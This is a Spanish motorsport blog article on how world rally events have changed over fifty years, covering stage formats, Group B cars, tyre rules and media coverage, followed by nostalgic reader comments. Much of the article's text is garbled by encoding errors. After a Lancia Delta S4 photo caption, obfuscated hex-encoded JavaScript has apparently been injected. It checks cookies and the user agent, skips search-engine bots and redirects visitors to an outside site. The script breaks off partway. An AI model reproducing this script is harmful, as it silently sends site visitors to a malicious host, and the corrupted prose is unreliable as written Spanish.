CA?mo han cambiado los rallies en 50 aAi??os

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“Los de antes sAi?? que eran rallies, no los de ahoraai??i??”, es una frase tAi??pica de veteranos aficionados del rally. Pero A?tiene razA?n?

Los equipos oficiales cuentan ahora con el apoyo de los centros tAi??cnicos y de I+D de sus respectivas centrales y, ademA?s, con un departamento deportivo propio, una autAi??ntica fA?brica de autos de carreras. Hace medio siglo era muy diferente.

El Montecarlo sigue abriendo el calendario anual del Mundial de Rally, pero ya no es igual que hace medio siglo… Longitud, formato, comunicaciA?n… han evolucionado junto a los autos, neumA?ticos y formaciA?n de los equipos.

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FIA WORLD RALLY CHAMPIONSHIP 2017 -WRC Monte Carlo (FRA) - WRC 18/01/2017 to 22/01/2017 - PHOTO : @World

Siempre tiende a idealizarse el pasado, sobre todo comprimiendo el tiempo y recordando momentos e hitos de distintas Ai??pocas. Lo cierto es que, si echamos la vista atrA?s -a los aAi??os ’60/70- los rallies ya gozaban de una gran popularidad entre pA?blico, marcas y medios.

El Montecarlo era el rey absoluto (con mA?s aAi??os que ninguno), pero pruebas como el AcrA?polis de Grecia, el Tour de Corse, el Rally de Portugal o el Safari de Kenya formaban ya parte del “Olimpo” del aficionado, componiendo la columna vertebral Campeonato del Mundo FIA. En aquellos tiempos, cada rally era diferente en duraciA?n (algunos hasta una semana), en tipo de terreno y formato A?y tenAi??an su propio carA?cter!: el Montecarlo requerAi??a salir de varias capitales europeas y concentrarse en MA?naco, con largos enlaces a medias “imposibles” que contaban decisivamente en la clasificaciA?n final. Lo mismo ocurrAi??a en el Tour de Corse, donde la regularidad y velocidad en los enlaces primaba sobre los cortos tramos cronometrados. A?Y quAi?? decir del Safari! AllAi?? se conducAi??a en caminos abiertos, entre el caA?tico trA?fico local y los animales salvajes durante 5.000 km…

Hoy en dAi??a, los rallies del Mundial -con la leve excepciA?n del Montecarlo- son todos iguales, con tres dAi??as de duraciA?n, no mA?s de 800 km de longitud y no mA?s de 350 km cronometrados, muy concentrados sobre un punto central. Pocos tramos, que se repiten varias veces cada dAi??a antes de volver a la base, donde se reA?nen las asistencias en forma de “parque de asistencia”. Muy distinto a aquellos tiempos de rallies lineales, donde cada equipo ubicaba las asistencias donde mA?s le interesaba (A?hasta en medio de un tramo cronometrado!) en funciA?n de sus estrategias. Esto ha llevado a pruebas mA?s cortas, limitadas por la autonomAi??a de combustible de los autos, casi todas diurnas (por temas de seguridad y por el helicA?ptero mAi??dico) y por la restricciA?n de neumA?ticos. Hace cincuenta aAi??os, Ai??stos eran libres en nA?mero y compuesto, mientras que, ahora, cada auto dispone de un nA?mero limitado (de 30 a 40), marcados y en unos compuestos elegidos antes de la prueba.

Ari Vatanen (FIN) David Richards (GBR) Ford Escort RS Gr4 Ford Rothmans Rally Team

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No cabe duda que se han reducido los costos -ya de por sAi?? desorbitados- pero se perdiA? en deportividad. Por el mismo motivo se han reducido los entrenamientos previos (antes ilimitados) a sA?lo tres dAi??as y dos pasadas por tramo, a velocidad controlada y sobre autos de serie.

El WRC moderno es mA?s profesional y mediA?tico. PodrAi??a decirse que mA?s caro en tAi??rminos absolutos, aunque antiguamente las marcas se gastaban igualmente todo el dinero y recursos disponibles, a pesar de que fueran mucho menores. Los equipos oficiales cuentan ahora con el apoyo de los centros tAi??cnicos y de I+D de sus respectivas centrales. Hace medio siglo, Ford, Alpine o Fiat confiaban en preparadores-satAi??lite o repartAi??an la construcciA?n de sus autos de competiciA?n entre varios. Hoy, el reglamento limita a 60 personas por equipo, aunque no se cuentan los ingenieros, informA?ticos y todo el respaldo que se queda “en casa” y estA? conectado on-line dando soporte a las decisiones que se toman en el rally.

La FIA se esfuerza en tratar de reducir los costos y en buscar nuevos participantes. Bien es cierto que actualmente hay suficientes marcas: Ford, CitroAi??n, Hyundai, Toyota… pero falla el volumen total de inscriptos. Hace 50 aAi??os habAi??a rallyes con 250 participantes. Hoy, el que mA?s reA?ne, llega a 68 y el que menos a 38. Los costos de inscripciA?n en el Campeonato son altAi??simos, asAi?? como los condicionantes para que un piloto nacional corra la prueba de su paAi??s. Y eso que en los A?ltimos tiempos se ha “democratizado” un poco mA?s el acceso, sobre todo creando categorAi??as como el WRC2, o las Copas y Trofeos para los Dos Ruedas Motrices.

Y, ya que entramos en los autos, A?por quAi?? no compararlos en el tiempo? La normativa ha pasado de los Grupos 1 a 4 a los WRC 1 a 5, pasando por la Ai??poca “de la letras” (aAi??os ’80/90) con los Gr. N, A y B. En todos los casos van de vehAi??culos de calle menos y mA?s preparados a autAi??nticos prototipos de competiciA?n, variando en funciA?n de unidades fabricadas al aAi??o, en mAi??nimos de homologaciA?n, en tracciA?n a dos o cuatro ruedas…

World Rally Championship 1981 Rally Limbard Markku Alen (fin) - Ikka Kivimaki (fin) Lancia Stratos

El gran salto tecnolA?gico lo dio el Audi Quattro a finales de los ’70, cuando impuso la tracciA?n total en los rallies. Hasta entonces la mayorAi??a de los autos ganadores eran de propulsiA?n a las ruedas posteriores (Alpine, Ford Escort, Fiat 124 y 131, Datsun 240, Seat 124…) con la excepciA?n de algunos de tracciA?n delantera (Mini-Cooper, CitroAi??n DS, Saab 96…). El Grupo B (1982/86) revolucionA? el panorama con autAi??nticos prototipos de(20 unidades de una serie de 200) con chasis tubular, motor central turboalimentado (de hasta 700 CV) tracciA?n total y exagerada aerodinA?mica: sin duda los autos de rally mA?s brutales, espectaculares… y peligrosos que se han visto.

En los primeros aAi??os de la dAi??cada del 70, los autos ganadores (Gr.4) tenAi??an motores atmosfAi??ricos de apenas 2 litros de cilindrada (algunos, menos) que sA?lo soAi??aban con los 200 CV y tenAi??an dos ruedas motrices. Hoy, los WRC cuentan con motores turbo con 1.600 cc -como mucho- pero con 350 CV o mA?s, tracciA?n total con diferencial central electrA?nico, suspensiones con amortiguadores inteligentes y aerodinA?mica estudiada en tA?nel del viento.Ai?? Es el signo de los tiempos…

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Y no olvidemos otro detalle: hace medio siglo, cuando la precisiA?n y la regularidad en los enlaces decidAi??a aquellos rallies “al Ai??ndice”, los copilotos manejaban cronA?metros de cuerda y agujas, tablas de tiempos y el famoso “tripmaster” mecA?nico Halda. Actualmente estA? prohibido que reciban informaciA?n exterior de tiempos, pero los aparatos de mediciA?n electrA?nicos limitan su tarea casi a “cantar las notas” de las pruebas especiales, que tambiAi??n tiene su mAi??rito.

Una mejora para el aficionado ha sido la tecnologAi??a audiovisual. Seguir el desarrollo de un rally en los ’60 era casi imposible si no se estaba en la sala de prensa o pegado a una emisora de radio que comunicara los resultados (y siempre con retardo). Hoy se puede seguir en directo gracias a internet, con los resultados en el acto, con las declaraciones de los pilotos tras cada tramo y hasta con imA?genes en directo desde las cA?maras on-board de los coches.

Eso sAi??, lo que no ha cambiado es lo que busca todo aficionado: la posibilidad de verlos pasar desde las cunetas… aunque cada vez sea desde mA?s lejos, en aras de la seguridad.

Massimo Miki Biasion (ITA) Tiziano Siviero (ITA) Lancia Delta S4 GrB Martini Racing 3rd positionvar _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== 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7 Comentarios, RSS

  1. Beppe Viola 05/02/2018 @ 8:11 am

    Y con esto que ?? existe alguno que diga que los rallyes modernos son mejores ?? … lo unico en lo que puedo estar de acuerdo es que son mas seguros y que son mas “comunicados” gracias a internet y al uso de las comunicaciones satelitales que en los tiempos heroicos no existian…
    de el resto que me vienen a contar ?!?!?!….
    ..Y lo que vale para el Rally, vale tambien para la F1 y el Endurance….
    è che cazzo !!!

  2. Pablo Felipe Richetti 05/02/2018 @ 9:39 am

    Totalmente de acuerdo con don Beppe…

  3. Daniele Garone 05/02/2018 @ 10:58 am

    Coincido totalmente con los comentarios anteriores. En F1 por ejemplo, un buen piloto tenía que tener la sensibilidad suficiente para la puesta a punto del auto, saber cuidar los neumáticos para que duraran toda la carrera (la elección de los neumáticos era crucial), la comunicación se efectuaba a través de carteles en boxes y el riesgo de accidentes fatales era infinitamente más alto. Hasta las máquinas eran más lindas.
    De ningún modo se desconoce el mérito y valor de los pilotos actuales .

  4. charly 05/02/2018 @ 11:28 am

    Antes los autos que corrían un rally eran casi tal cual salidos de fabrica,un Austin Healey un Citroen DS eran tal cual afuera y adentro, hoy son una mentira total, de original casi nada. Antes el costo de armar una auto de rally era relativamente económico y podía participar un particular. No quiere decir que no mire rally hoy y me maraville las técnicas modernas.
    pd: gracias por la primera foto Erik ganando Montecarlo 1963, ídolo, tuve la suerte de sentarme a su lado y que maneje mi 96 en una visita que hizo a Argentina Uruguay.

  5. RaúlPL17 06/02/2018 @ 3:07 am

    Agregaría también a uno de los grandes protagonistas de esos años, Lancia Fulvia, también con tracción delantera.
    Ahora, los WRC tienen una potencia similar o mayor a los inolvidables Grupo B. Pero hay todo un sistema que hace que exista mayor seguridad.

  6. hector daniel 06/02/2018 @ 6:44 pm

    Por eso me gusta mucho el Rallye Monte-Carlo Historique que tiene mucho del sabor añejo en donde se mezcla el cronómetro con la velocidad .

  7. Juha Biakkinen 08/02/2018 @ 12:01 am

    Gran nota Diego, nostálgica comparación para los que vivimos ambas épocas. Personalmente creo que son muy difíciles de comparar dado que si bien siempre fueron carreras de velocidad, antes eran más de resistencia símil RAID y hoy son más del estilo clasificación de F1. De hecho antes se cronometraba por diferencia de segundos redondos y hoy por décimas de segundo. Hasta las hojas de ruta propias de cada binomio cargan mucha más info hoy que antes, en pos de darlo todo y no tanto de cuidar para llegar. Por otro lado, la modernidad e inmediatez informativa y práctica para obtener esa información llevó a los organizadores a realizar esquemas de carrera llamados Mickey Mouse (por lo compactos) o de trébol. Esto también abarató costos de seguridad medica y policial, además de facilitar el control del numeroso público y también así mostrar más llenas las gradas naturales, cerrando por todos lados para la FIA y organizadores. También la televisación ha evolucionado mucho y los autos acutuales son impresionantes, tanto que traen el recuerdo de los míticos grupo B de 500 cv y 800 kilos, por ello es imposible competirles y pierde interés el hacerlo en desigualdad de condiciones o hacerlo románticamente con “el de calle” (hoy prohibido). En el pasado el piloto local contaba con la ventaja de conocer los caminos y así mantener expectante a su público, el mismo que hoy lo vería caer por media hora frente a un ignoto ucraniano navegado por un neocelandés. Dicho esto, más lo explicado en la nota, considero que si hoy se corriese como ayer, el rally sería impopular debido a no haberse adaptado a la modernidad, que exige por ejemplo que los partidos de tenis terminen rápido sus sets con tie break, para que no caiga el interés en la audiencia.
    Para RAID está el DAKAR, para velocidad, prefiero estos verdaderos F1 de montaña que definen carreras el último día y por escasos segundos. Me resta invitarlos a que se den una vuelta por El Cóndor o Los Gigantes del 26 al 29 de abril próximos o que sigan el rally blanco, uno de los más veloces, desde la semana entrante.

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